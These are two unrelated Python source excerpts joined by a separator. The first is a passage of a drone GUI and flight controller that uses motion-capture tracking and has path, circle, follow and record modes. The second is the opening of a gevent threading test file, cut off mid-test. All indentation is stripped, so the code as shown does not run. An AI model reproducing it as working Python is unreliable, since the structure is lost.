# PATH
path = QState(parent_state)
path.assignProperty(self, "status", "Path Mode")
path.assignProperty(self.pathButton, "text", "Stop")
path.assignProperty(self.followButton, "text", "Follow Mode")
path.assignProperty(self.circleButton, "text", "Circle Mode")
path.assignProperty(self.recordButton, "text", "Record Mode")
path.assignProperty(self.pathButton, "enabled", True)
path.assignProperty(self.emergencyButton, "enabled", True)
path.assignProperty(self.landButton, "enabled", True)
path.assignProperty(self.followButton, "enabled", False)
path.assignProperty(self.liftButton, "enabled", False)
path.assignProperty(self.circleButton, "enabled", False)
path.assignProperty(self.recordButton, "enabled", False)
path.entered.connect(self._flight_mode_path_entered)
# FOLLOW
follow = QState(parent_state)
follow.assignProperty(self, "status", "Follow Mode")
follow.assignProperty(self.pathButton, "text", "Path Mode")
follow.assignProperty(self.followButton, "text", "Stop")
follow.assignProperty(self.circleButton, "text", "Circle Mode")
follow.assignProperty(self.recordButton, "text", "Record Mode")
follow.assignProperty(self.pathButton, "enabled", False)
follow.assignProperty(self.emergencyButton, "enabled", True)
follow.assignProperty(self.landButton, "enabled", True)
follow.assignProperty(self.followButton, "enabled", False)
follow.assignProperty(self.liftButton, "enabled", False)
follow.assignProperty(self.circleButton, "enabled", False)
follow.assignProperty(self.recordButton, "enabled", False)
follow.entered.connect(self._flight_mode_follow_entered)
# LIFT
lift = QState(parent_state)
lift.assignProperty(self, "status", "Lifting...")
lift.assignProperty(self.pathButton, "enabled", False)
lift.assignProperty(self.emergencyButton, "enabled", True)
lift.assignProperty(self.landButton, "enabled", True)
lift.assignProperty(self.followButton, "enabled", False)
lift.assignProperty(self.liftButton, "enabled", False)
lift.assignProperty(self.circleButton, "enabled", False)
lift.assignProperty(self.recordButton, "enabled", False)
lift.entered.connect(self._flight_mode_lift_entered)
# LAND
land = QState(parent_state)
land.assignProperty(self, "status", "Landing...")
land.assignProperty(self.pathButton, "enabled", False)
land.assignProperty(self.emergencyButton, "enabled", True)
land.assignProperty(self.landButton, "enabled", False)
land.assignProperty(self.followButton, "enabled", False)
land.assignProperty(self.liftButton, "enabled", False)
land.assignProperty(self.circleButton, "enabled", False)
land.assignProperty(self.recordButton, "enabled", False)
land.entered.connect(self._flight_mode_land_entered)
# CIRCLE
circle = QState(parent_state)
circle.assignProperty(self, "status", "Circle Mode")
circle.assignProperty(self.pathButton, "text", "Path Mode")
circle.assignProperty(self.followButton, "text", "Follow Mode")
circle.assignProperty(self.circleButton, "text", "Stop")
circle.assignProperty(self.recordButton, "text", "Record Mode")
circle.assignProperty(self.pathButton, "enabled", False)
circle.assignProperty(self.emergencyButton, "enabled", True)
circle.assignProperty(self.landButton, "enabled", True)
circle.assignProperty(self.followButton, "enabled", False)
circle.assignProperty(self.liftButton, "enabled", False)
circle.assignProperty(self.circleButton, "enabled", True)
circle.assignProperty(self.recordButton, "enabled", False)
circle.entered.connect(self._flight_mode_circle_entered)
# RECORD
record = QState(parent_state)
record.assignProperty(self, "status", "Record Mode")
record.assignProperty(self.pathButton, "text", "Path Mode")
record.assignProperty(self.followButton, "text", "Follow Mode")
record.assignProperty(self.circleButton, "text", "Circle Mode")
record.assignProperty(self.recordButton, "text", "Stop")
record.assignProperty(self.pathButton, "enabled", False)
record.assignProperty(self.emergencyButton, "enabled", True)
record.assignProperty(self.landButton, "enabled", False)
record.assignProperty(self.followButton, "enabled", False)
record.assignProperty(self.liftButton, "enabled", False)
record.assignProperty(self.circleButton, "enabled", False)
record.assignProperty(self.recordButton, "enabled", True)
record.entered.connect(self._flight_mode_record_entered)
def add_transition(mode, child_state, parent):
transition = FlightModeTransition(mode)
transition.setTargetState(child_state)
parent.addTransition(transition)
add_transition(FlightModeStates.LAND, land, parent_state)
add_transition(FlightModeStates.LIFT, lift, parent_state)
add_transition(FlightModeStates.FOLLOW, follow, parent_state)
add_transition(FlightModeStates.PATH, path, parent_state)
add_transition(FlightModeStates.HOVERING, hovering, parent_state)
add_transition(FlightModeStates.GROUNDED, grounded, parent_state)
add_transition(FlightModeStates.DISCONNECTED, disconnected,
parent_state)
add_transition(FlightModeStates.CIRCLE, circle, parent_state)
add_transition(FlightModeStates.RECORD, record, parent_state)
parent_state.setInitialState(disconnected)
self._machine.addState(parent_state)
self._machine.setInitialState(parent_state)
self._machine.start()
def _update_flight_status(self):
prev_flying_enabled = self.flying_enabled
self.flying_enabled = self._cf is not None and \
self._qtm_connection is not None
if not prev_flying_enabled and self.flying_enabled:
self.switch_flight_mode(FlightModeStates.GROUNDED)
t = threading.Thread(target=self.flight_controller)
t.start()
if prev_flying_enabled and not self.flying_enabled:
self.switch_flight_mode(FlightModeStates.DISCONNECTED)
def _is_discovering(self, discovering):
if discovering:
self.qtmIpBox.clear()
self.discoverQTM.setEnabled(not discovering)
def _qtm_discovered(self, info, ip):
self.qtmIpBox.addItem("{} {}".format(ip, info))
@pyqtSlot(str)
def _update_status(self, status):
self.statusLabel.setText("Status: {}".format(status))
@pyqtSlot(str)
def _update_cf_status(self, status):
self.cfStatusLabel.setText(status)
@pyqtSlot(str)
def _update_qtm_status(self, status):
self.qtmStatusLabel.setText(status)
@pyqtSlot(str)
def quad_changed(self, quad):
self.quadName = quad
@pyqtSlot(str)
def stick_changed(self, stick):
self.stickName = stick
# Properties
@pyqtProperty(str, notify=statusChanged)
def status(self):
return self._status
@status.setter
def status(self, value):
if value != self._status:
self._status = value
self.statusChanged.emit(value)
@pyqtProperty(str, notify=qtmStatusChanged)
def qtmStatus(self):
return self._qtm_status
@qtmStatus.setter
def qtmStatus(self, value):
if value != self._qtm_status:
self._qtm_status = value
self.qtmStatusChanged.emit(value)
@pyqtProperty(str, notify=cfStatusChanged)
def cfStatus(self):
return self._qtm_status
@cfStatus.setter
def cfStatus(self, value):
if value != self._cf_status:
self._cf_status = value
self.cfStatusChanged.emit(value)
def _select_flight_path_row(self, row):
self.flightPathDataTable.selectRow(row)
def _set_flight_path_model(self, model):
self.flightPathDataTable.setModel(model)
def _add_path_selector_item(self, item):
self.pathSelector.addItem(item)
def _set_path_selector_index(self, index):
self.pathSelector.setCurrentIndex(index)
def path_changed(self):
if self.flight_mode == FlightModeStates.PATH:
self.switch_flight_mode(FlightModeStates.HOVERING)
time.sleep(0.1)
# Flight path ui table setup
self.model = QStandardItemModel(10, 4)
self.model.setHorizontalHeaderItem(0, QStandardItem('X (m)'))
self.model.setHorizontalHeaderItem(1, QStandardItem('Y (m)'))
self.model.setHorizontalHeaderItem(2, QStandardItem('Z (m)'))
self.model.setHorizontalHeaderItem(3, QStandardItem('Yaw (deg)'))
# Populate the table with data
if (len(self.flight_paths) == 0):
return
current = self.flight_paths[self.pathSelector.currentIndex()]
for i in range(1, len(current)):
for j in range(0, 4):
self.model.setItem(i - 1, j,
QStandardItem(str(current[i][j])))
self._flight_path_set_model.emit(self.model)
Config().set("flight_paths", self.flight_paths)
def remove_current_path(self):
if self.flight_mode == FlightModeStates.PATH:
self.switch_flight_mode(FlightModeStates.HOVERING)
time.sleep(0.1)
if len(self.flight_paths) == 0:
return
current_index = self.pathSelector.currentIndex()
answer = QMessageBox.question(
self, "CFClient: Qualisystab", "Delete the flightpath: {}?".format(
self.flight_paths[current_index][0]),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.flight_paths.pop(current_index)
self.pathSelector.clear()
for j in range(len(self.flight_paths)):
self.pathSelector.addItem(self.flight_paths[j][0])
if current_index == 0:
self.pathSelector.setCurrentIndex(0)
else:
self.pathSelector.setCurrentIndex(current_index - 1)
self.path_changed()
def set_lift_mode(self):
self.switch_flight_mode(FlightModeStates.LIFT)
def set_land_mode(self):
self.switch_flight_mode(FlightModeStates.LAND)
def set_circle_mode(self):
# Toggle circle mode on and off
if self.flight_mode == FlightModeStates.CIRCLE:
self.switch_flight_mode(FlightModeStates.HOVERING)
else:
try:
self.position_hold_timelimit = float(
self.posHoldCircleBox.text())
self.circle_radius = float(self.radiusBox.text())
self.circle_resolution = float(self.resolutionBox.text())
self.circle_pos_threshold = (2 * self.circle_radius * round(
math.sin(math.radians(
(self.circle_resolution / 2))), 4)) * 2
logger.info(self.circle_pos_threshold)
except ValueError as err:
self.status = ("illegal character used in circle"
" settings: {}").format(str(err))
logger.info(self.status)
return
self.switch_flight_mode(FlightModeStates.CIRCLE)
def set_record_mode(self):
# Toggle record mode on and off
if self.flight_mode == FlightModeStates.RECORD:
# Cancel the recording
self.recording = False
self.switch_flight_mode(FlightModeStates.GROUNDED)
self.land_for_recording = False
elif self.flight_mode != FlightModeStates.GROUNDED:
# If the cf is flying, start by landing
self.land_for_recording = True
self.switch_flight_mode(FlightModeStates.LAND)
else:
self.switch_flight_mode(FlightModeStates.RECORD)
def set_follow_mode(self):
# Toggle follow mode on and off
if self.flight_mode == FlightModeStates.FOLLOW:
self.switch_flight_mode(FlightModeStates.HOVERING)
else:
self.switch_flight_mode(FlightModeStates.FOLLOW)
def set_path_mode(self):
logger.info(self.model.item(0, 0))
# Toggle path mode on and off
# Path mode on, return to hovering
if self.flight_mode == FlightModeStates.PATH:
self.switch_flight_mode(FlightModeStates.HOVERING)
elif self.model.item(0, 0) is None:
self.status = "missing Flight Plan"
return
# Path mode off, read data from UI table and start path mode
else:
try:
self.position_hold_timelimit = float(
self.posHoldPathBox.text())
except ValueError as err:
self.status = ("illegal character used in path"
" settings: {}").format(str(err))
logger.info(self.status)
return
# Get the flightpath from the GUI table
x, y = 0, 0
temp = self.model.item(x, y)
reading_data = True
list = ''
while reading_data:
try:
element = str(temp.text())
if element != "":
list += temp.text()
# a "," gets added after the last element,
# remove that later for neatness
list += ','
try:
float(element)
except ValueError:
self._flight_path_select_row.emit(y)
self.status = ("Value at cell x:{} y:{} "
"must be a number").format(x, y)
logger.info(self.status)
break
x += 1
if x % 4 == 0:
x = 0
y += 1
# list += temp_position
# temp_position = []
temp = self.model.item(y, x)
except Exception as err:
reading_data = False
# remove the last "," element
list = list[:(len(list) - 1)]
list = list.split(',')
list = [float(i) for i in list]
if (len(list) % 4) != 0:
self.status = ("Missing value to create a valid"
" flight path")
logger.info(self.status)
break
list = [list[i:i + 4] for i in range(0, len(list), 4)]
list.insert(
0,
self.flight_paths[self.pathSelector.currentIndex()][0])
self.flight_paths[self.pathSelector.currentIndex()] = list
Config().set("flight_paths", self.flight_paths)
self.switch_flight_mode(FlightModeStates.PATH)
def set_kill_engine(self):
self.send_setpoint(Position(0, 0, 0))
self.switch_flight_mode(FlightModeStates.GROUNDED)
logger.info('Stop button pressed, kill engines')
def establish_qtm_connection(self):
if self.qtmIpBox.count() == 0 and self.qtmIpBox.currentText() == "":
return
if self._qtm_connection is None:
try:
ip = self.qtmIpBox.currentText().split(" ")[0]
except Exception as e:
logger.error("Incorrect entry: %s", e)
return
self.connectQtmButton.setEnabled(False)
start_async_task(self.qtm_connect(ip))
else:
self._qtm_connection.disconnect()
self._qtm_connection = None
async def qtm_connect(self, ip):
connection = await qtm.connect(
ip,
on_event=self.on_qtm_event,
on_disconnect=lambda reason: start_async_task(
self.on_qtm_disconnect(reason)))
if connection is None:
start_async_task(self.on_qtm_disconnect("Failed to connect"))
return
self._qtm_connection = connection
await self.setup_qtm_connection()
def setup_6dof_comboboxes(self):
quadName = self.quadName
stickName = self.stickName
self.quadBox.clear()
self.stickBox.clear()
for label in self.qtm_6DoF_labels:
self.quadBox.addItem(label)
self.stickBox.addItem(label)
if quadName in self.qtm_6DoF_labels:
self.quadBox.setCurrentIndex(
self.qtm_6DoF_labels.index(quadName))
if stickName in self.qtm_6DoF_labels:
self.stickBox.setCurrentIndex(
self.qtm_6DoF_labels.index(stickName))
async def setup_qtm_connection(self):
self.connectQtmButton.setEnabled(True)
self.connectQtmButton.setText('Disconnect QTM')
self.qtmStatus = ': connected : Waiting QTM to start sending data'
try:
result = await self._qtm_connection.get_parameters(
parameters=['6d'])
# Parse the returned xml
xml = ET.fromstring(result)
self.qtm_6DoF_labels = [label.text for label in xml.iter('Name')]
# Make all names lowercase
self.qtm_6DoF_labels = [x.lower() for x in self.qtm_6DoF_labels]
logger.info('6Dof bodies active in qtm: {}'.format(
self.qtm_6DoF_labels))
self.setup_6dof_comboboxes()
# Gui
self.qtmStatus = ': connected'
self.qtmCfPositionBox.setEnabled(True)
self.qtmWandPositionBox.setEnabled(True)
self.discoverQTM.setEnabled(False)
self.qtmIpBox.setEnabled(False)
self._update_flight_status()
self._ui_update_timer.start(200)
# Make sure this is the last thing done with the qtm_connection
# (due to qtmRTProtocol structure)
await self._qtm_connection.stream_frames(
components=['6deuler', '3d'], on_packet=self.on_packet)
except Exception as err:
logger.info(err)
async def on_qtm_disconnect(self, reason):
"""Callback when QTM has been disconnected"""
self._ui_update_timer.stop()
self._update_flight_status()
self._qtm_connection = None
logger.info(reason)
# Gui
self.qtmCfPositionBox.setEnabled(False)
self.qtmWandPositionBox.setEnabled(False)
self.discoverQTM.setEnabled(True)
self.qtmIpBox.setEnabled(True)
self.connectQtmButton.setEnabled(True)
self.connectQtmButton.setText('Connect QTM')
self.qtmStatus = ': not connected : {}'.format(
reason if reason is not None else '')
def on_qtm_event(self, event):
logger.info(event)
if event == qtm.QRTEvent.EventRTfromFileStarted:
self.qtmStatus = ': connected'
self.qtmCfPositionBox.setEnabled(True)
self.qtmWandPositionBox.setEnabled(True)
elif event == qtm.QRTEvent.EventRTfromFileStopped:
self.qtmStatus = ': connected : Waiting QTM to start sending data'
self.qtmCfPositionBox.setEnabled(False)
self.qtmWandPositionBox.setEnabled(False)
def on_packet(self, packet):
# Callback when QTM sends a 'packet' of the requested data,
# one every tracked frame.
# The speed depends on QTM settings
header, bodies = packet.get_6d_euler()
# Cf not created yet or no packet received due to various reasons...
# Wait for the two asynchronous calls in 'setup connection'
# to return with data
if bodies is None or self.qtm_6DoF_labels is None:
return
try:
temp_cf_pos = bodies[self.qtm_6DoF_labels.index(self.quadName)]
# QTM returns in mm in the order x, y, z, the Crazyflie api need
# data in meters, divide by thousand
# QTM returns euler rotations in deg in the order
# yaw, pitch, roll, not Qualisys Standard!
self.cf_pos = Position(
temp_cf_pos[0][0] / 1000,
temp_cf_pos[0][1] / 1000,
temp_cf_pos[0][2] / 1000,
roll=temp_cf_pos[1][2],
pitch=temp_cf_pos[1][1],
yaw=temp_cf_pos[1][0])
except ValueError as err:
self.qtmStatus = ' : connected : No 6DoF body found'
try:
temp_wand_pos = bodies[self.qtm_6DoF_labels.index(self.stickName)]
self.wand_pos = Position(
temp_wand_pos[0][0] / 1000,
temp_wand_pos[0][1] / 1000,
temp_wand_pos[0][2] / 1000,
roll=temp_wand_pos[1][2],
pitch=temp_wand_pos[1][1],
yaw=temp_wand_pos[1][0])
except ValueError as err:
self.qtmStatus = ' : connected : No 6DoF body found'
if self._cf is not None and self.cf_pos.is_valid():
# If a cf exists and the position is valid
# Feed the current position of the cf back to the cf to
# allow for self correction
self._cf.extpos.send_extpos(self.cf_pos.x, self.cf_pos.y,
self.cf_pos.z)
def _update_ui(self):
# Update the data in the GUI
self.qualisysX.setText(("%0.4f" % self.cf_pos.x))
self.qualisysY.setText(("%0.4f" % self.cf_pos.y))
self.qualisysZ.setText(("%0.4f" % self.cf_pos.z))
self.qualisysRoll.setText(("%0.2f" % self.cf_pos.roll))
self.qualisysPitch.setText(("%0.2f" % self.cf_pos.pitch))
self.qualisysYaw.setText(("%0.2f" % self.cf_pos.yaw))
self.qualisysWandX.setText(("%0.4f" % self.wand_pos.x))
self.qualisysWandY.setText(("%0.4f" % self.wand_pos.y))
self.qualisysWandZ.setText(("%0.4f" % self.wand_pos.z))
self.qualisysWandRoll.setText(("%0.2f" % self.wand_pos.roll))
self.qualisysWandPitch.setText(("%0.2f" % self.wand_pos.pitch))
self.qualisysWandYaw.setText(("%0.2f" % self.wand_pos.yaw))
def _flight_mode_land_entered(self):
self.current_goal_pos = self.valid_cf_pos
logger.info('Trying to land at: x: {} y: {}'.format(
self.current_goal_pos.x, self.current_goal_pos.y))
self.land_rate = 1
self._event.set()
def _flight_mode_path_entered(self):
self.path_index = 1
current = self.flight_paths[self.pathSelector.currentIndex()]
self.current_goal_pos = Position(
current[self.path_index][0],
current[self.path_index][1],
current[self.path_index][2],
yaw=current[self.path_index][3])
logger.info('Setting position {}'.format(
self.current_goal_pos))
self._flight_path_select_row.emit(self.path_index - 1)
self._event.set()
def _flight_mode_circle_entered(self):
self.current_goal_pos = Position(
round(math.cos(math.radians(self.circle_angle)),
8) * self.circle_radius,
round(math.sin(math.radians(self.circle_angle)), 8)
* self.circle_radius,
self.circle_height,
yaw=self.circle_angle)
logger.info('Setting position {}'.format(
self.current_goal_pos))
self._event.set()
def _flight_mode_follow_entered(self):
self.last_valid_wand_pos = Position(0, 0, 1)
self._event.set()
def _flight_mode_record_entered(self):
self.new_path = []
self._event.set()
def _flight_mode_lift_entered(self):
self.current_goal_pos = self.valid_cf_pos
logger.info('Trying to lift at: {}'.format(
self.current_goal_pos))
self._event.set()
def _flight_mode_hovering_entered(self):
self.current_goal_pos = self.valid_cf_pos
logger.info('Hovering at: {}'.format(
self.current_goal_pos))
self._event.set()
def _flight_mode_grounded_entered(self):
self._event.set()
def _flight_mode_disconnected_entered(self):
self._event.set()
def flight_controller(self):
try:
logger.info('Starting flight controller thread')
self._cf.param.set_value('stabilizer.estimator', '2')
self.reset_estimator(self._cf)
self._cf.param.set_value('flightmode.posSet', '1')
time.sleep(0.1)
# The threshold for how many frames without tracking
# is allowed before the cf's motors are stopped
lost_tracking_threshold = 100
frames_without_tracking = 0
position_hold_timer = 0
self.circle_angle = 0.0
# The main flight control loop, the behaviour
# is controlled by the state of "FlightMode"
while self.flying_enabled:
# Check that the position is valid and store it
if self.cf_pos.is_valid():
self.valid_cf_pos = self.cf_pos
frames_without_tracking = 0
else:
# if it isn't, count number of frames
frames_without_tracking += 1
if frames_without_tracking > lost_tracking_threshold:
self.switch_flight_mode(FlightModeStates.GROUNDED)
self.status = "Tracking lost, turning off motors"
logger.info(self.status)
# If the cf is upside down, kill the motors
if self.flight_mode != FlightModeStates.GROUNDED and (
self.valid_cf_pos.roll > 120
or self.valid_cf_pos.roll < -120):
self.switch_flight_mode(FlightModeStates.GROUNDED)
self.status = "Status: Upside down, turning off motors"
logger.info(self.status)
# Switch on the FlightModeState and take actions accordingly
# Wait so that any on state change actions are completed
self._event.wait()
if self.flight_mode == FlightModeStates.LAND:
self.send_setpoint(
Position(
self.current_goal_pos.x,
self.current_goal_pos.y,
(self.current_goal_pos.z / self.land_rate),
yaw=0))
# Check if the cf has reached the position,
# if it has set a new position
if self.valid_cf_pos.distance_to(
Position(self.current_goal_pos.x,
self.current_goal_pos.y,
self.current_goal_pos.z / self.land_rate
)) < self.path_pos_threshold:
self.land_rate *= 1.1
if self.land_rate > 1000:
self.send_setpoint(Position(0, 0, 0))
if self.land_for_recording:
# Return the control to the recording mode
# after landing
mode = FlightModeStates.RECORD
self.land_for_recording = False
else:
# Regular landing
mode = FlightModeStates.GROUNDED
self.switch_flight_mode(mode)
elif self.flight_mode == FlightModeStates.PATH:
self.send_setpoint(self.current_goal_pos)
# Check if the cf has reached the goal position,
# if it has set a new goal position
if self.valid_cf_pos.distance_to(
self.current_goal_pos) < self.path_pos_threshold:
if position_hold_timer > self.position_hold_timelimit:
current = self.flight_paths[
self.pathSelector.currentIndex()]
self.path_index += 1
if self.path_index == len(current):
self.path_index = 1
position_hold_timer = 0
self.current_goal_pos = Position(
current[self.path_index][0],
current[self.path_index][1],
current[self.path_index][2],
yaw=current[self.path_index][3])
logger.info('Setting position {}'.format(
self.current_goal_pos))
self._flight_path_select_row.emit(
self.path_index - 1)
elif position_hold_timer == 0:
time_of_pos_reach = time.time()
# Add som time just to get going,
# it will be overwritten in the next step.
# Setting it higher than the limit
# will break the code.
position_hold_timer = 0.0001
else:
position_hold_timer = time.time(
) - time_of_pos_reach
elif self.flight_mode == FlightModeStates.CIRCLE:
self.send_setpoint(self.current_goal_pos)
# Check if the cf has reached the goal position,
# if it has set a new goal position
if self.valid_cf_pos.distance_to(
self.current_goal_pos) < self.circle_pos_threshold:
if position_hold_timer >= self.position_hold_timelimit:
position_hold_timer = 0
# increment the angle
self.circle_angle = ((self.circle_angle +
self.circle_resolution)
% 360)
# Calculate the next position in
# the circle to fly to
self.current_goal_pos = Position(
round(
math.cos(math.radians(self.circle_angle)),
4) * self.circle_radius,
round(
math.sin(math.radians(self.circle_angle)),
4) * self.circle_radius,
self.circle_height,
yaw=self.circle_angle)
logger.info('Setting position {}'.format(
self.current_goal_pos))
elif position_hold_timer == 0:
time_of_pos_reach = time.time()
# Add som time just to get going, it will be
# overwritten in the next step.
# Setting it higher than the imit will
# break the code.
position_hold_timer = 0.0001
else:
position_hold_timer = time.time(
) - time_of_pos_reach
elif self.flight_mode == FlightModeStates.FOLLOW:
if self.wand_pos.is_valid():
self.last_valid_wand_pos = self.wand_pos
# Fit the angle of the wand in the interval 0-4
self.length_from_wand = (2 * (
(self.wand_pos.roll + 90) / 180) - 1) + 2
self.send_setpoint(
Position(
self.wand_pos.x + round(
math.cos(math.radians(self.wand_pos.yaw)),
4) * self.length_from_wand,
self.wand_pos.y + round(
math.sin(math.radians(self.wand_pos.yaw)),
4) * self.length_from_wand,
((self.wand_pos.z + round(
math.sin(
math.radians(self.wand_pos.pitch)), 4)
* self.length_from_wand) if
((self.wand_pos.z + round(
math.sin(
math.radians(self.wand_pos.pitch)), 4)
* self.length_from_wand) > 0) else 0)))
else:
self.length_from_wand = (2 * (
(self.last_valid_wand_pos.roll + 90) / 180) -
1) + 2
self.send_setpoint(
Position(
self.last_valid_wand_pos.x + round(
math.cos(
math.radians(
self.last_valid_wand_pos.yaw)),
4) * self.length_from_wand,
self.last_valid_wand_pos.y + round(
math.sin(
math.radians(
self.last_valid_wand_pos.yaw)),
4) * self.length_from_wand,
int(self.last_valid_wand_pos.z + round(
math.sin(
math.radians(self.last_valid_wand_pos.
pitch)), 4) *
self.length_from_wand)))
elif self.flight_mode == FlightModeStates.LIFT:
self.send_setpoint(
Position(self.current_goal_pos.x,
self.current_goal_pos.y, 1))
if self.valid_cf_pos.distance_to(
Position(self.current_goal_pos.x,
self.current_goal_pos.y, 1)) < 0.05:
# Wait for hte crazyflie to reach the goal
self.switch_flight_mode(FlightModeStates.HOVERING)
elif self.flight_mode == FlightModeStates.HOVERING:
self.send_setpoint(self.current_goal_pos)
elif self.flight_mode == FlightModeStates.RECORD:
if self.valid_cf_pos.z > 1.0 and not self.recording:
# Start recording when the cf is lifted
self.recording = True
# Start the timer thread
self.save_current_position()
# Gui
self.status = "Recording Flightpath"
logger.info(self.status)
elif self.valid_cf_pos.z < 0.03 and self.recording:
# Stop the recording when the cf is put on
# the ground again
logger.info("Recording stopped")
self.recording = False
# Remove the last bit (1s) of the recording,
# containing setting the cf down
for self.path_index in range(20):
self.new_path.pop()
# Add the new path to list and Gui
now = datetime.datetime.fromtimestamp(time.time())
new_name = ("Recording {}/{}/{} {}:{}".format(
now.year - 2000, now.month
if now.month > 9 else "0{}".format(now.month),
now.day if now.day > 9 else "0{}".format(now.day),
now.hour if now.hour > 9 else "0{}".format(
now.hour), now.minute
if now.minute > 9 else "0{}".format(now.minute)))
self.new_path.insert(0, new_name)
self.flight_paths.append(self.new_path)
self._path_selector_add_item.emit(new_name)
# Select the new path
self._path_selector_set_index.emit(
len(self.flight_paths) - 1)
self.path_changed()
Config().set("flight_paths", self.flight_paths)
# Wait while the operator moves away
self.status = "Replay in 3s"
time.sleep(1)
self.status = "Replay in 2s"
time.sleep(1)
self.status = "Replay in 1s"
time.sleep(1)
# Switch to path mode and replay the recording
self.switch_flight_mode(FlightModeStates.PATH)
elif self.flight_mode == FlightModeStates.GROUNDED:
pass # If gounded, the control is switched back to gamepad
time.sleep(0.001)
except Exception as err:
logger.error(err)
self.cfStatus = str(err)
logger.info('Terminating flight controller thread')
def save_current_position(self):
if self.recording:
# Restart the timer
threading.Timer(0.05, self.save_current_position).start()
# Save the current position
self.new_path.append([
self.valid_cf_pos.x, self.valid_cf_pos.y,
self.valid_cf_pos.z, self.valid_cf_pos.yaw
])
def _connected(self, link_uri):
"""Callback when the Crazyflie has been connected"""
self._cf = self._helper.cf
self._update_flight_status()
logger.debug("Crazyflie connected to {}".format(link_uri))
# Gui
self.cfStatus = ': connected'
def _disconnected(self, link_uri):
"""Callback for when the Crazyflie has been disconnected"""
logger.info("Crazyflie disconnected from {}".format(link_uri))
self.cfStatus = ': not connected'
self._cf = None
self._update_flight_status()
def _param_updated(self, name, value):
"""Callback when the registered parameter get's updated"""
logger.debug("Updated {0} to {1}".format(name, value))
def _log_data_received(self, timestamp, data, log_conf):
"""Callback when the log layer receives new data"""
logger.debug("{0}:{1}:{2}".format(timestamp, log_conf.name, data))
def _logging_error(self, log_conf, msg):
"""Callback from the log layer when an error occurs"""
QMessageBox.about(
self, "Example error", "Error when using log config"
" [{0}]: {1}".format(log_conf.name, msg))
def wait_for_position_estimator(self, cf):
logger.info('Waiting for estimator to find stable position...')
self.cfStatus = (
'Waiting for estimator to find stable position... '
'(QTM needs to be connected and providing data)'
)
log_config = LogConfig(name='Kalman Variance', period_in_ms=500)
log_config.add_variable('kalman.varPX', 'float')
log_config.add_variable('kalman.varPY', 'float')
log_config.add_variable('kalman.varPZ', 'float')
var_y_history = [1000] * 10
var_x_history = [1000] * 10
var_z_history = [1000] * 10
threshold = 0.001
with SyncLogger(cf, log_config) as log:
for log_entry in log:
data = log_entry[1]
var_x_history.append(data['kalman.varPX'])
var_x_history.pop(0)
var_y_history.append(data['kalman.varPY'])
var_y_history.pop(0)
var_z_history.append(data['kalman.varPZ'])
var_z_history.pop(0)
min_x = min(var_x_history)
max_x = max(var_x_history)
min_y = min(var_y_history)
max_y = max(var_y_history)
min_z = min(var_z_history)
max_z = max(var_z_history)
# print("{} {} {}".
# format(max_x - min_x, max_y - min_y, max_z - min_z))
if (max_x - min_x) < threshold and (
max_y - min_y) < threshold and (
max_z - min_z) < threshold:
logger.info("Position found with error in, x: {}, y: {}, "
"z: {}".format(max_x - min_x,
max_y - min_y,
max_z - min_z))
self.cfStatus = ": connected"
self.switch_flight_mode(FlightModeStates.GROUNDED)
break
def reset_estimator(self, cf):
# Reset the kalman filter
cf.param.set_value('kalman.resetEstimation', '1')
time.sleep(0.1)
cf.param.set_value('kalman.resetEstimation', '0')
self.wait_for_position_estimator(cf)
def switch_flight_mode(self, mode):
# Handles the behaviour of switching between flight modes
self.flight_mode = mode
# Handle client input control.
# Disable gamepad input if we are not grounded
if self.flight_mode in [
FlightModeStates.GROUNDED,
FlightModeStates.DISCONNECTED,
FlightModeStates.RECORD
]:
self._helper.mainUI.disable_input(False)
else:
self._helper.mainUI.disable_input(True)
self._event.clear()
# Threadsafe call
self._machine.postEvent(FlightModeEvent(mode))
logger.info('Switching Flight Mode to: %s', mode)
def send_setpoint(self, pos):
# Wraps the send command to the crazyflie
if self._cf is not None:
self._cf.commander.send_position_setpoint(pos.x, pos.y, pos.z, 0.0)
class Position:
def __init__(self, x, y, z, roll=0.0, pitch=0.0, yaw=0.0):
self.x = x
self.y = y
self.z = z
self.roll = roll
self.pitch = pitch
self.yaw = yaw
def distance_to(self, other_point):
return math.sqrt(
math.pow(self.x - other_point.x, 2) +
math.pow(self.y - other_point.y, 2) +
math.pow(self.z - other_point.z, 2))
def is_valid(self):
# Checking if the respective values are nan
return self.x == self.x and self.y == self.y and self.z == self.z
def __str__(self):
return "x: {} y: {} z: {} Roll: {} Pitch: {} Yaw: {}".format(
self.x, self.y, self.z, self.roll, self.pitch, self.yaw)
|
test_threading.py
|
# Very rudimentary test of threading module
print("GEVENT: Begin import")
import test.test_support
from test.test_support import verbose, cpython_only
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
try:
import _testcapi
except ImportError:
_testcapi = None
except:
# gevent: a distutils.errors.LinkError is sometimes raised.
# It appears that it happens during concurrent test runs;
# some lib_pypy/_testcapimodule.o file is truncated
_testcapi = None
import lock_tests # gevent: use local copy
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegexpMatches(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
